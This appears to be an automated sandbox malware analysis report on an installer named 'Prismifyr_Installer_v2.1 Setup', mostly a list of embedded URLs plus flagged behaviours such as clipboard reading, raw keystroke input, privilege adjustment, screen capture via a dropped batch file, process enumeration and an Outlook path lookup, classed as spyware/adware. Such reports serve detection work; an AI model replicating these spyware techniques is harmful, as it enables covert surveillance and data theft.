00000000.00000003.2461642034.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462040884.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462894354.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464652978.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6098869?hl=es
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#eqn-modulo
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-defineownproperty-p-de
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getownproperty-p
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getprototypeof
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-ownpropertykeys
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc1928#section-3
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc5234#appendix-B.1
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparams
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://v8.dev/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/aria/#aria-hidden.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/aria/#aria-hidden.Blocked
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/aria/#aria-hidden.ChildrenChangedWithCleanLayoutAccessibility
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/manifest/#installability-signals
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/manifest/#installability-signalsThe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/uievents/#legacy-event-types)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-converttoint
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-integerpart
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webidl.spec.whatwg.org/#es-DOMString
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webidl.spec.whatwg.org/#es-dictionary
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webidl.spec.whatwg.org/#es-invoking-callback-functions
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webkit.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://webrtc.googlesource.com/src/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.bluetooth.com/specifications/gatt/characteristics
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.bluetooth.com/specifications/gatt/descriptors
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.bluetooth.com/specifications/gatt/services
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5093566007214080
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5093566007214080ErrorEventInit7ssJ
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5636954674692096
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5644273861001216.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5682658461876224.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5718547946799104
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/5738264052891648
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/6662647093133312
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromestatus.com/feature/6662647093133312InputDeviceCapabilities
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.chromium.org
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.khronos.org/registry/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.opensource.org/licenses/bsd-license.php)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8288.html#section-3
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.unicode.org/copyright.html.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/.
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405461
Installs a raw input device (often for capturing keystrokes)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_23dfaacd-9

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File dump: Prismifyr_Installer_v2.1.exe.0.dr 186389504 Jump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File dump: Prismifyr_Installer_v2.1.exe0.0.dr 186389504 Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe File dump: Prismifyr_Installer_v2.1.exe.5.dr 186389504 Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040338F
Detected potential crypto function
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00406B15 0_2_00406B15
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_004072EC 0_2_004072EC
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00404C9E 0_2_00404C9E
Enables security privileges
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Process token adjusted: Security Jump to behavior
PE file contains executable resources (Code or Archives)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file contains more sections than normal
Source: Prismifyr_Installer_v2.1.exe.0.dr Static PE information: Number of sections : 15 > 10
Source: Prismifyr_Installer_v2.1.exe0.0.dr Static PE information: Number of sections : 15 > 10
Source: Prismifyr_Installer_v2.1.exe.5.dr Static PE information: Number of sections : 15 > 10
Sample file is different than original file name gathered from version info
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2275595296.0000000006186000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461234245.0000000000849000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2411787381.0000000005226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameR vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2478072599.0000000002E15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2400741511.0000000005220000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameElevate.exeH vs Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: // did the user specify their own .sln file?
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: * On Windows, find the first build/*.sln file.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: glob('build/*.sln', function (err, files) {
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: return path.extname(arg) === '.sln'
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sln_path = os.path.splitext(build_file)[0] + options.suffix + ".sln"
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: # GUID is the same whether it's included from base/base.sln or
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: # foo/bar/baz/baz.sln.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: return callback(new Error('Could not find *.sln file. Did you run "configure"?'))
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: """Generate .sln and .vcproj files.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sln_path = build_file_root + options.suffix + ".sln"
Source: classification engine Classification label: mal60.adwa.spyw.winEXE@48/136@0/0
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040338F
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404722
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00402104 CoCreateInstance, 0_2_00402104
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Mutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Mutant created: \Sessions\1\BaseNamedObjects\7b4c3a21-e2df-5efd-beb5-591edeb53a62
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3476:120:WilError_03
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsiC60A.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" "
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
